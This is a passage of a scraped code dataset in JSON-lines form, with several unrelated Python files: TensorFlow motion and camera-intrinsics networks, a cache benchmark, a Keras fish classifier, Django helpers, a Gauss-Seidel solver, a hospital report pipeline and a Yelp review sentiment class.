bottlenech\n features of a netrowk.\n image_height: A scalar tf.Tensor or an python scalar, the image height in\n pixels.\n image_width: A scalar tf.Tensor or an python scalar, the image width in\n pixels.\n\n image_height and image_width are used to provide the right scale for the focal\n length and the offest parameters.\n\n Returns:\n a tf.Tensor of shape [B, 3, 3], and type float32, where the 3x3 part is the\n intrinsic matrix: (fx, 0, x0), (0, fy, y0), (0, 0, 1).\n \"\"\"\n with tf.variable_scope('CameraIntrinsics'):\n # Since the focal lengths in pixels tend to be in the order of magnitude of\n # the image width and height, we multiply the network prediction by them.\n focal_lengths = tf.squeeze(\n layers.conv2d(\n bottleneck,\n 2, [1, 1],\n stride=1,\n activation_fn=tf.nn.softplus,\n weights_regularizer=None,\n scope='foci'),\n axis=(1, 2)) * tf.to_float(\n tf.convert_to_tensor([[image_width, image_height]]))\n\n # The pixel offsets tend to be around the center of the image, and they\n # are typically a fraction the image width and height in pixels. We thus\n # multiply the network prediction by the width and height, and the\n # additional 0.5 them by default at the center of the image.\n offsets = (tf.squeeze(\n layers.conv2d(\n bottleneck,\n 2, [1, 1],\n stride=1,\n activation_fn=None,\n weights_regularizer=None,\n biases_initializer=None,\n scope='offsets'),\n axis=(1, 2)) + 0.5) * tf.to_float(\n tf.convert_to_tensor([[image_width, image_height]]))\n\n foci = tf.linalg.diag(focal_lengths)\n\n maybe_summary.scalar('foci', tf.reduce_mean(foci))\n maybe_summary.scalar('offsets', tf.reduce_mean(offsets))\n\n intrinsic_mat = tf.concat([foci, tf.expand_dims(offsets, -1)], axis=2)\n batch_size = tf.shape(bottleneck)[0]\n last_row = tf.tile([[[0.0, 0.0, 1.0]]], [batch_size, 1, 1])\n intrinsic_mat = tf.concat([intrinsic_mat, last_row], axis=1)\n return intrinsic_mat\n\n\ndef motion_field_net(images,\n weight_reg=0.0,\n align_corners=True,\n auto_mask=False):\n \"\"\"Predict object-motion vectors from a stack of frames or embeddings.\n\n Args:\n images: Input tensor with shape [B, h, w, 2c], containing two\n depth-concatenated images.\n weight_reg: A float scalar, the amount of weight regularization.\n align_corners: align_corners in resize_bilinear. Only used in version 2.\n auto_mask: True to automatically masking out the residual translations\n by thresholding on their mean values.\n\n Returns:\n A tuple of 3 tf.Tensors:\n rotation: [B, 3], global rotation angles.\n background_translation: [B, 1, 1, 3], global translation vectors.\n residual_translation: [B, h, w, 3], residual translation vector field. The\n overall translation field is background_translation+residual_translation.\n \"\"\"\n\n with tf.variable_scope('MotionFieldNet'):\n with arg_scope([layers.conv2d],\n weights_regularizer=layers.l2_regularizer(weight_reg),\n activation_fn=tf.nn.relu):\n\n conv1 = layers.conv2d(images, 16, [3, 3], stride=2, scope='Conv1')\n conv2 = layers.conv2d(conv1, 32, [3, 3], stride=2, scope='Conv2')\n conv3 = layers.conv2d(conv2, 64, [3, 3], stride=2, scope='Conv3')\n conv4 = layers.conv2d(conv3, 128, [3, 3], stride=2, scope='Conv4')\n conv5 = layers.conv2d(conv4, 256, [3, 3], stride=2, scope='Conv5')\n conv6 = layers.conv2d(conv5, 512, [3, 3], stride=2, scope='Conv6')\n conv7 = layers.conv2d(conv6, 1024, [3, 3], stride=2, scope='Conv7')\n\n bottleneck = tf.reduce_mean(conv7, axis=[1, 2], keepdims=True)\n\n background_motion = layers.conv2d(\n bottleneck,\n 6, [1, 1],\n stride=1,\n activation_fn=None,\n biases_initializer=None,\n scope='background_motion')\n\n rotation = background_motion[:, 0, 0, :3]\n background_translation = background_motion[:, :, :, 3:]\n\n residual_translation = layers.conv2d(\n background_motion,\n 3, [1, 1],\n stride=1,\n activation_fn=None,\n scope='unrefined_residual_translation')\n residual_translation = _refine_motion_field(\n residual_translation, conv7, align_corners, scope='Refine7')\n residual_translation = _refine_motion_field(\n residual_translation, conv6, align_corners, scope='Refine6')\n residual_translation = _refine_motion_field(\n residual_translation, conv5, align_corners, scope='Refine5')\n residual_translation = _refine_motion_field(\n residual_translation, conv4, align_corners, scope='Refine4')\n residual_translation = _refine_motion_field(\n residual_translation, conv3, align_corners, scope='Refine3')\n residual_translation = _refine_motion_field(\n residual_translation, conv2, align_corners, scope='Refine2')\n residual_translation = _refine_motion_field(\n residual_translation, conv1, align_corners, scope='Refine1')\n residual_translation = _refine_motion_field(\n residual_translation, images, align_corners, scope='RefineImages')\n\n rot_scale, trans_scale = create_scales(0.001)\n background_translation *= trans_scale\n residual_translation *= trans_scale\n rotation *= rot_scale\n\n if auto_mask:\n sq_residual_translation = tf.sqrt(\n tf.reduce_sum(residual_translation**2, axis=3, keepdims=True))\n mean_sq_residual_translation = tf.reduce_mean(\n sq_residual_translation, axis=[0, 1, 2])\n # A mask of shape [B, h, w, 1]\n mask_residual_translation = tf.cast(\n sq_residual_translation > mean_sq_residual_translation,\n residual_translation.dtype.base_dtype)\n residual_translation *= mask_residual_translation\n\n image_height, image_width = tf.unstack(tf.shape(images)[1:3])\n intrinsic_mat = add_intrinsics_head(bottleneck, image_height, image_width)\n\n return (rotation, background_translation, residual_translation,\n intrinsic_mat)\n\n\ndef create_scales(constraint_minimum):\n \"\"\"Creates variables representing rotation and translation scaling factors.\n\n Args:\n constraint_minimum: A scalar, the variables will be constrained to not fall\n below it.\n\n Returns:\n Two scalar variables, rotation and translation scale.\n \"\"\"\n\n def constraint(x):\n return tf.nn.relu(x - constraint_minimum) + constraint_minimum\n\n with tf.variable_scope('Scales', initializer=0.01, constraint=constraint):\n rot_scale = tf.get_variable('rotation')\n trans_scale = tf.get_variable('translation')\n maybe_summary.scalar('rotation', rot_scale)\n maybe_summary.scalar('translation', trans_scale)\n\n return rot_scale, trans_scale\n\n\ndef _refine_motion_field(motion_field, layer, align_corners, scope=None):\n \"\"\"Refines a motion field using features from another layer.\n\n This function builds an element of a UNet-like architecture. `motion_field`\n has a lower spatial resolution than `layer`. First motion_field is resized to\n `layer`'s spatial resolution using bilinear interpolation, then convolutional\n filters are applied on `layer` and the result is added to the upscaled\n `motion_field`.\n\n This scheme is inspired by FlowNet (https://arxiv.org/abs/1504.06852), and the\n realization that keeping the bottenecks at the same (low) dimension as the\n motion field will pressure the network to gradually transfer details from\n depth channels to space.\n\n The specifics are slightly different form FlowNet: We use two parallel towers,\n a 3x3 convolution, and two successive 3x3 convolutions, as opposed to one\n 3x3 convolution in FLowNet. Also, we add the result to the upscaled\n `motion_field`, forming a residual connection, unlike FlowNet. These changes\n seemed to improve the depth prediction metrics, but exploration was far from\n exhaustive.\n\n Args:\n motion_field: a tf.Tensor of shape [B, h1, w1, m]. m is the number of\n dimensions in the motion field, for example, 3 in case of a 3D translation\n field.\n layer: tf.Tensor of shape [B, h2, w2, c].\n align_corners: align_corners in resize_bilinear.\n scope: the variable scope.\n\n Returns:\n A tf.Tensor of shape [B, h2, w2, m], obtained by upscaling motion_field to\n h2, w2, and mixing it with layer using a few convolutions.\n\n \"\"\"\n with tf.variable_scope(scope):\n _, h, w, _ = tf.unstack(tf.shape(layer))\n # Only align_corners=True is supported on TPU\n upsampled_motion_field = tf.image.resize_bilinear(\n motion_field, [h, w], align_corners=align_corners)\n conv_input = tf.concat([upsampled_motion_field, layer], axis=3)\n # pyformat: disable\n conv_output = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n conv_input = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n conv_output2 = layers.conv2d(\n conv_input, max(4, layer.shape.as_list()[-1]), [3, 3], stride=1)\n # pyformat: enable\n conv_output = tf.concat([conv_output, conv_output2], axis=-1)\n\n return upsampled_motion_field + layers.conv2d(\n conv_output,\n motion_field.shape.as_list()[-1], [1, 1],\n stride=1,\n activation_fn=None,\n biases_initializer=None)\n","repo_name":"google-research/google-research","sub_path":"depth_and_motion_learning/object_motion_nets.py","file_name":"object_motion_nets.py","file_ext":"py","file_size_in_byte":12241,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"1753796579","text":"from abc import ABC, abstractmethod\nfrom hashlib import sha256\nimport os\nfrom pathlib import Path\nimport random\nfrom time import sleep, time\nfrom uuid import uuid4\nfrom morecontext import envset\nfrom fscacher import PersistentCache\n\n\nclass BaseCacheBenchmark(ABC):\n param_names = [\"mode\"]\n params = [[\"populate\", \"hit\", \"ignore\"]]\n\n @abstractmethod\n def init_path(self, *args):\n # Must return the path created\n ...\n\n @staticmethod\n @abstractmethod\n def init_func(cache):\n # Must return the function\n ...\n\n def init_cache(self, ignore: bool = False):\n with envset(\"FSCACHER_CACHE\", \"ignore\" if ignore else \"\"):\n self.cache = PersistentCache(path=str(uuid4()))\n self.func = self.init_func(self.cache)\n\n def setup(self, mode, *args):\n self.path = self.init_path(mode, *args)\n if mode == \"hit\":\n self.init_cache()\n self.func(self.path)\n elif mode == \"ignore\":\n self.init_cache(ignore=True)\n\n def time_cache(self, mode, *_args):\n if mode == \"populate\":\n self.init_cache()\n self.func(self.path)\n\n\nclass TimeFile(BaseCacheBenchmark):\n FILE_SIZE = 1024\n\n def init_path(self, *_args):\n with open(\"foo.dat\", \"wb\") as fp:\n fp.write(bytes(random.choices(range(256), k=self.FILE_SIZE)))\n return \"foo.dat\"\n\n @staticmethod\n def init_func(cache):\n @cache.memoize_path\n def hashfile(path):\n # \"emulate\" slow invocation so significant raise in benchmark\n # consumed time would mean that we invoked it instead\n # of using cached value\n sleep(0.01)\n with open(path, \"rb\") as fp:\n return sha256(fp.read()).hexdigest()\n\n return hashfile\n\n\nclass BaseDirectoryBenchmark(BaseCacheBenchmark):\n param_names = BaseCacheBenchmark.param_names + [\"tmpdir\"]\n params = BaseCacheBenchmark.params + [\n os.environ.get(\"FSCACHER_BENCH_TMPDIRS\", \".\").split(\":\")\n ]\n\n @staticmethod\n @abstractmethod\n def get_layout():\n ...\n\n def init_path(self, _mode, tmpdir):\n dirpath = Path(tmpdir, str(uuid4()))\n dirpath.mkdir(parents=True)\n base_time = time()\n dirs = [dirpath]\n layout = self.get_layout()\n for i, width in enumerate(layout):\n if i < len(layout) - 1:\n dirs2 = []\n for d in dirs:\n for x in range(width):\n d2 = d / f\"d{x}\"\n d2.mkdir()\n dirs2.append(d2)\n dirs = dirs2\n else:\n for j, d in enumerate(dirs):\n for x in range(width):\n f = d / f\"f{x}.dat\"\n f.write_bytes(b\"\\0\" * random.randint(1, 1024))\n t = base_time - x - j * width\n os.utime(f, (t, t))\n return dirpath\n\n @staticmethod\n def init_func(cache):\n @cache.memoize_path\n def dirsize(path):\n total_size = 0\n with os.scandir(path) as entries:\n for e in entries:\n if e.is_dir():\n total_size += dirsize(e.path)\n else:\n total_size += e.stat().st_size\n return total_size\n\n return dirsize\n\n\nclass TimeFlatDirectory(BaseDirectoryBenchmark):\n @staticmethod\n def get_layout():\n return (100,)\n\n\nclass TimeDeepDirectory(BaseDirectoryBenchmark):\n @staticmethod\n def get_layout():\n return (3, 3, 3, 3)\n","repo_name":"con/fscacher","sub_path":"benchmarks/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6252097996","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping\nfrom keras.preprocessing.image import load_img, img_to_array\n\n\n# In[2]:\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# In[3]:\n\n\nepochs = 30\n\n\n# In[4]:\n\n\n# データをつくる\ntrain_datagen = ImageDataGenerator(rescale=1.0/255, rotation_range=90, width_shift_range=0.2, height_shift_range=0.2,\n horizontal_flip=True)\ntest_datagen = ImageDataGenerator(rescale=1.0/255)\n\n\n# In[5]:\n\n\ntrain_generator = train_datagen.flow_from_directory('../data/butterflyfish/train', target_size=(200,200),\n batch_size=32, class_mode='binary')\n\n\n# In[6]:\n\n\nvalidation_generator = test_datagen.flow_from_directory('../data/butterflyfish/validation', target_size=(200,200),\n batch_size=32, class_mode='binary')\n\n\n# In[7]:\n\n\n# モデルをつくる\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3), activation='relu', input_shape=(200, 200, 3)))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Convolution2D(32, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\nmodel.add(Convolution2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1, activation='sigmoid'))\n\n\n# In[8]:\n\n\nprint(train_generator.class_indices)\n\n\n# In[9]:\n\n\nmodel.summary()\n\n\n# In[10]:\n\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n# In[11]:\n\n\nhistory = model.fit_generator(train_generator, epochs=epochs, verbose=1, validation_data=validation_generator)\n\n\n# In[12]:\n\n\nplt.plot(range(1, epochs+1), history.history['acc'], label=\"training\")\nplt.plot(range(1, epochs+1), history.history['val_acc'], label=\"validation\")\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\nplt.legend()\nplt.show()\n\n\n# In[15]:\n\n\nimg = load_img(\"../data/originaldata/test.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[16]:\n\n\narray = img_to_array(img)\narray /= 255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n\n# In[17]:\n\n\nimg = load_img(\"../data/originaldata/test2.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[18]:\n\n\narray = img_to_array(img)\narray /= 255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n\n# In[19]:\n\n\nimg = load_img(\"../data/originaldata/test3.jpg\", target_size=(200, 200))\nplt.imshow(img)\n\n\n# In[20]:\n\n\narray = img_to_array(img)\narray /= 255\nx = np.expand_dims(array, axis=0)\npred = model.predict(x)\nprint(pred[0])\nif pred[0] >= 0.5:\n print('トゲチョウチョウウオです')\nelse:\n print('チョウチョウウオです')\n\n","repo_name":"mizukiono/cnn_tutorial","sub_path":"butterflyfish/bfish_simplecnn.py","file_name":"bfish_simplecnn.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74050680006","text":"import datetime\nimport calendar\nfrom django.db.models import Q\nfrom booking_api.models import Equipment, Experiment,Lab, Professor\n\n\ndef dateToDay(date):\n format_date=datetime.datetime.strptime(date, \"%d%m%Y\").date()\n day=calendar.day_name[format_date.weekday()]\n return day.upper()[:2]\n\n\ndef get_lab_text_search(text):\n labs=Lab.objects.filter(Q(name__icontains=text) | Q(description__icontains=text)) \n return labs\n\ndef get_experiment_text_search(text):\n experiments=Experiment.objects.filter(Q(name__icontains=text.lower()) | Q(description__icontains=text.lower()))\n labs=[]\n print(Lab.get_all_labs())\n for lab in Lab.get_all_labs():\n print(\"a\")\n lab_exp=lab.experiments.all()\n print(lab_exp)\n if lab_exp.intersection(experiments).count()>0:\n print(lab)\n labs.append(lab.id)\n labs_set=Lab.objects.filter(id__in=labs)\n return labs_set\n\ndef get_equipment_text_search(text):\n equipments=Equipment.objects.filter(Q(name__icontains=text.lower()) | Q(description__icontains=text.lower()))\n labs=[]\n for lab in Lab.get_all_labs():\n lab_eq=lab.equipments.all()\n if lab_eq.intersection(equipments).count()>0:\n labs.append(lab.id)\n labs_set=Lab.objects.filter(id__in=labs)\n return labs_set\n\ndef get_research_text_search(text):\n professors=Professor.objects.filter(Q(research_field__icontains=text) | Q(research_description__icontains=text)) \n return professors\n","repo_name":"kunalbhatia-868/EasyBookLabsBackend","sub_path":"booking_api/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23345810574","text":"\n# COMMENT\n# This is a comment\n# print(\"aaa\")\n\npi = 3.14\nradius = 2.2\n\n# Aku lagi ingin menghitung luas lingkaran\n\n## INI RUMUS LINGKARAN LOH!!!\narea = pi * (radius ** 2)\nprint(area)\n# INI AREA LOHHHHH!!!\n\n# MEMORI\n\n# VARIABLE\n# integer -> int -> 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 [4 bytes]\n# string\n\narchel = 10 # MEMORI 4 BYTES\n\nprint(2**128)\n\n# int = min sama max vals. -> MIN -3.000.000 MAX 3.000.000 | -> 3.000.001 -> -2.999.999\n# nyewa space ada di RAM. -> 4 bytes -> 32 bits -> 2^32 -> \n\n# ---------\n\narchel_nganu = 9\narchel_ngeselin = False\nbatas_remed = 8.5\n\n# KLO ARCHEL KURANG DARI BATAS REMED, DIA REMED + DIA NGESELIN DIMARAAHIN ORANG TUA\n# KLO NGGAK NGESELIN, DIA TAPI SCORENYA DIATAS REMED DIKASIH UANG 100000\n# KLO NGGAK NGESELIN, DIA REMED, DIMARAHIN GURU\n\nif archel_nganu < batas_remed:\n if archel_ngeselin:\n print(\"ARCHEL DIMARAHIN ORANG TUA\")\n print(\"ARCHEL DIMARAHIN GURU\")\nelse:\n if archel_ngeselin:\n print(\"ARCHEL DIMARAHIN ORANG TUA + DAPET UANG 5000\")\n else:\n print(\"ARCHEL DAPET UANG 100000\")\n\n","repo_name":"KingOfChuunibyou/Hahahihi","sub_path":"lesson1/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"44181829651","text":"from django.forms import Field, HiddenInput, EmailInput, ValidationError\nfrom django.core.validators import EmailValidator\nfrom django.db.models import Model\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth.models import User\n\n\nclass UserField(Field):\n widget = EmailInput\n label = _(\"User e-mail\")\n validators = EmailValidator()\n\n def clean(self, value):\n try:\n user = User.objects.get(email=value)\n except User.DoesNotExist as err:\n raise ValidationError(_(\"User not found\"), \"user_not_found\") from err\n return user\n\n\nclass ForeignKeyRefField(Field):\n def __init__(\n self,\n fk_type,\n initial=None,\n ):\n if not issubclass(fk_type, Model):\n raise ValueError(\"fk_type has to be a subclass of django.db.models.Model\")\n\n super().__init__(\n required=True,\n widget=HiddenInput,\n label=None,\n initial=initial,\n help_text=None,\n error_messages=None,\n show_hidden_initial=False,\n validators=(),\n localize=False,\n disabled=False,\n label_suffix=None,\n )\n\n self.fk_type = fk_type\n\n def clean(self, value):\n value = int(value)\n fk_obj = self.fk_type.objects.get(pk=value)\n if not fk_obj:\n raise ValidationError(f\"Value is not a valid pk for {self.fk_type.__qualname__}\", code=\"obj_not_found\")\n return fk_obj\n","repo_name":"Skogstomten/produce-exchange-hub","sub_path":"farmers-market/farmers_market/main/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40372437215","text":"import numpy as np\n\nfrom primat.lab2.grad import norm_sq\nfrom primat.lab3.csr import Csr\n\n\ndef zeydel(a, b, eps):\n counter = 0\n n = a.n\n xp = None\n x = np.array(b, copy=True, dtype=np.longdouble)\n while xp is None or norm_sq(x - xp) > eps**2:\n counter += 1\n xp = x.copy()\n for i in range(n):\n x[i] = b[i]\n start, end = a.r[i : i + 2]\n for v, j in zip(a.v[start:end], a.c[start:end]):\n if i != j:\n x[i] -= v * x[j]\n x[i] /= a[i, i]\n return x, counter\n","repo_name":"MegaBluejay/primat","sub_path":"primat/lab3/zeydel.py","file_name":"zeydel.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5735227876","text":"def ExecuteProgram(send_mail, prod, download_data=True, preprocess=True, create_file=True, only_base=True):\n from traceback import format_exc\n from create_excel import gather_info_for_worksheets, create_excel_file\n from preprocess import preprocess_base, preprocess_secondary_table\n from dbcomms import retrieve_last_week_data_from_dbtasy, retrieve_specific_dates_from_dbtasy\n from send_email import send_standard_mail\n from src.helper_functions import delete_week_file\n from logging import getLogger\n \n \n logger = getLogger('standard')\n error_logger_name = 'error_prod' if prod else 'error_test'\n error_logger = getLogger(error_logger_name)\n print()\n print('*'*80)\n delete_file = send_mail\n success = True\n if download_data:\n success, query_name = retrieve_last_week_data_from_dbtasy()\n if not success:\n logger.error('Erro na comunicação com o DB (tabela: %s): %s' % (query_name, format_exc()))\n error_logger.error('Erro na comunicação com o DB (tabela: %s): %s' % (query_name, format_exc()))\n return\n if preprocess:\n try:\n preprocess_base()\n except Exception:\n logger.error('Erro ao processar dataset base: %s' % format_exc())\n error_logger.error('Erro ao processar dataset base: %s' % format_exc())\n return\n \n for name in ['resumo de internação médica', 'atestado', 'receita', 'evolução médica', 'avaliação médica pa template']:\n try:\n preprocess_secondary_table(dataset_name=name)\n except Exception:\n logger.error('Erro ao processar %s: %s' % (name, format_exc()))\n error_logger.error('Erro ao processar %s: %s' % (name, format_exc()))\n return\n \n \n if create_file:\n try:\n if only_base:\n df_base = gather_info_for_worksheets(only_base=True)\n else:\n df_base, df_resumo_internacao, df_atestado, df_receita, df_evolucao, df_avaliacao_pa = gather_info_for_worksheets(only_base=False)\n except Exception:\n logger.error('Erro ao coletar informações para as planilhas: %s' % format_exc())\n error_logger.error('Erro ao coletar informações para as planilhas: %s' % format_exc())\n return\n\n try:\n if only_base:\n create_excel_file(df_base, only_base=True)\n else:\n create_excel_file(df_base, False, df_resumo_internacao, df_atestado, df_receita, df_evolucao, df_avaliacao_pa)\n except Exception:\n logger.error('Erro ao criar arquivo excel: %s' % format_exc())\n error_logger.error('Erro ao criar arquivo excel: %s' % format_exc())\n return\n \n if send_mail:\n try:\n send_standard_mail(prod=prod)\n except Exception:\n logger.error('Erro ao enviar emails: %s' % format_exc())\n error_logger.error('Erro ao enviar emails: %s' % format_exc())\n return\n\n if delete_file:\n try:\n delete_week_file()\n except Exception:\n logger.error('Erro ao deletar arquivo da semana: %s' % format_exc())\n error_logger.error('Erro ao deletar arquivo da semana: %s' % format_exc())\n return\n \n logger.debug('FIM: Sucesso ao executar script\\n')\n\n \nif __name__ == '__main__':\n from argparse import ArgumentParser\n import logging.config\n from configs import LOGGING_CONFIG\n \n logging.config.dictConfig(LOGGING_CONFIG)\n \n parser = ArgumentParser(description=\"My parser\")\n parser.add_argument('--prod', dest='prod', action='store_true')\n parser.add_argument('--no-email', dest='no_email', action='store_true')\n parser.add_argument('--no-download', dest='no_download', action='store_true')\n parser.add_argument('--only-base', dest='only_base', action='store_true')\n parser.set_defaults(prod=False)\n parser.set_defaults(no_email=False)\n parser.set_defaults(no_download=False)\n parser.set_defaults(only_base=False)\n \n args = parser.parse_args()\n send_mail = not args.no_email\n download_data = not args.no_download\n only_base = args.only_base\n prod = args.prod\n \n if prod:\n only_base = True\n send_mail = True\n download_data = True\n\n ExecuteProgram(send_mail=send_mail, prod=prod, download_data=download_data, only_base=only_base)","repo_name":"ffreller/ColetaCallCenter","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19437767836","text":"class Student:\n def __init__(self, first_name, last_name, grades=None):\n self.first_name = first_name\n self.last_name = last_name\n self.grades = grades if grades is not None else []\n\n def add_grade(self, grade):\n self.grades.append(grade)\n\n def __len__(self):\n return len(self.grades)\n\n def __str__(self):\n return f\"{self.first_name} {self.last_name} - Оцінки: {self.grades}\"\n\n# Створення списку студентів\nstudents = [\n Student(\"Олександр\", \"Петров\", [5, 4, 4, 5]),\n Student(\"Ірина\", \"Сергієнко\", [4, 5]),\n Student(\"Анна\", \"Іванова\", [5, 4, 4, 5, 3]),\n Student(\"Володимир\", \"Мельник\")\n]\n\n# Додаємо оцінки для Володимира\nstudents[3].add_grade(4)\nstudents[3].add_grade(3)\n\n# Сортуємо список студентів за кількістю оцінок\nsorted_students = sorted(students, key=lambda student: len(student), reverse=True)\n\n# Виведення відсортованого списку\nfor student in sorted_students:\n print(student)\n","repo_name":"barsuk4/IT-Brain","sub_path":"L011/it-brain_065.py","file_name":"it-brain_065.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20878854610","text":"from .models import *\nfrom django.db.models import Max\n# Helper functions to be used throughout the project\n\n# Returns a dictionary with listing as key and max_bid as value\ndef get_max_bids(listings):\n listings_max_bids = {}\n max_bids = Bid.objects.values('listing').annotate(Max('bid'))\n\n for listing in listings:\n listings_max_bids[listing] = max_bids.get(listing=listing)['bid__max']\n return listings_max_bids","repo_name":"melshinawy/cs50-project2-commerce","sub_path":"auctions/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7330927807","text":"from modules.useful_functions import *\n\nfrom itertools import islice\nimport json\nfrom textblob import TextBlob\n# run python3 -m textblob.download_corpora\nfrom tqdm import tqdm\n\n\nclass Dataset():\n\n def __init__(self, n_reviews, dataset_name):\n self.n_reviews = n_reviews\n if dataset_name == \"Yelp\":\n restaurants_ids = load_or_create_cache(n_reviews, \"restaurants_ids\", self.find_restaurants_id, \"dataset/yelp_academic_dataset_business.json\")\n self.dict_reviews = load_or_create_cache(n_reviews, \"reviews\", self.find_restaurants_good_reviews, \"dataset/yelp_academic_dataset_review.json\", restaurants_ids)\n self.reviews = load_or_create_cache(n_reviews, \"sentences\", self.extract_texts, self.dict_reviews)\n\n def find_restaurants_id(self, file_path):\n \"\"\"\n returns list of 'business_id' with 'Restaurants' in 'categories'\n \"\"\"\n restaurants_ids = []\n with open(file_path) as f:\n for line in tqdm(f):\n business = json.loads(line)\n if business[\"categories\"]:\n if 'Restaurants' in business[\"categories\"]:\n restaurants_ids.append(business[\"business_id\"])\n \n return restaurants_ids\n\n def find_restaurants_good_reviews(self, file_path, restaurants_ids):\n \"\"\"\n returns list of reviews (= dict, so as in json file) matching requirements on business.categories and reviews.helpful\n \"\"\"\n reviews = []\n if self.n_reviews == 'all':\n with open(file_path) as f:\n for line in tqdm(f):\n review = json.loads(line)\n if review[\"business_id\"] in restaurants_ids and review[\"useful\"] > 3:\n reviews.append(review)\n else:\n with open(file_path) as f:\n reviews = list(islice(f, self.n_reviews))\n reviews = [json.loads(review) for review in reviews]\n reviews = [review for review in reviews if (review[\"business_id\"] in restaurants_ids) and (review[\"useful\"])]\n reviews = [review for review in reviews if review[\"useful\"] > 3]\n print(f'{len(reviews)} reviews')\n return reviews\n\n def extract_texts(self, dict_reviews):\n \"\"\"\n returns list of list of strings\n list of reviews x list of raw sentences\n \"\"\"\n reviews = []\n n_sentences = 0\n for review_idx, dict_review in tqdm(enumerate(dict_reviews)):\n review = Review(dict_review, len(reviews))\n raw_sentences = review.blob.raw_sentences\n # for s in raw_sentences:\n # if not s.lower().islower():\n # print(f'\\n\\n\\n !!!!! ISSUE with sentence in review {review_idx} \\n {b} \\n\\n\\n')\n for raw_sentence in raw_sentences:\n review.sentences.append(Sentence(raw_sentence, review_idx, n_sentences))\n n_sentences += 1\n reviews.append(review)\n return reviews\n\nclass Review():\n\n def __init__(self, dict_review, review_idx):\n self.idx = review_idx\n self.id = dict_review['review_id']\n self.text = dict_review['text']\n self.blob = TextBlob(self.text)\n self.sentences = []\n self.scores = dict()\n self.labeled_stars = float(dict_review['stars'])\n self.estimated_stars = None\n self.criteria_weights = dict()\n self.n_criteria = 0\n\n def compute_multicriteria_scores(self, criteria_names):\n extended_scores = {criterion: [] for criterion in criteria_names}\n for sentence in self.sentences:\n if sentence.criterion and sentence.polarity_score:\n criterion, weight = sentence.criterion\n extended_scores[criterion].append((sentence.idx, weight, sentence.polarity_score))\n for criterion in criteria_names:\n if extended_scores[criterion]:\n self.n_criteria += 1\n criterion_weight = sum([weight for (_, weight, _) in extended_scores[criterion]])\n self.criteria_weights[criterion] = criterion_weight\n score = sum([weight * polarity for (_, weight, polarity) in extended_scores[criterion]])/criterion_weight\n self.scores[criterion] = (score+1)/2*5 + 0.5\n else:\n self.scores[criterion] = None\n self.criteria_weights[criterion] = 0\n self.extended_scores = extended_scores\n\n def show_sentence_criterion_polarity(self):\n text = f'*******************\\nREVIEW {self.idx}\\n*******************\\n'\n for criterion in self.extended_scores.keys():\n text += criterion + '--------------\\n'\n weights_sum = sum([weight for _, weight, _ in self.extended_scores[criterion]])\n for sentence_idx, weight, _ in self.extended_scores[criterion]:\n sentence = [sentence for sentence in self.sentences if sentence.idx == sentence_idx][0]\n text += f\"{round(weight/weights_sum*100)}% / {sentence.polarity_score} -- {sentence.raw_sentence}\\n\"\n text += 'None --------------\\n'\n for sentence in self.sentences:\n if not sentence.criterion or not sentence.polarity_score:\n text += sentence.raw_sentence + '\\n'\n print('\\n'+text)\n \n def compute_mean_stars(self, criteria_names, stars_averaging):\n if stars_averaging == 'weighted':\n total_weight = sum(list(self.criteria_weights.values()))\n self.estimated_stars = 0\n for criterion in criteria_names:\n if self.criteria_weights[criterion]:\n self.estimated_stars += 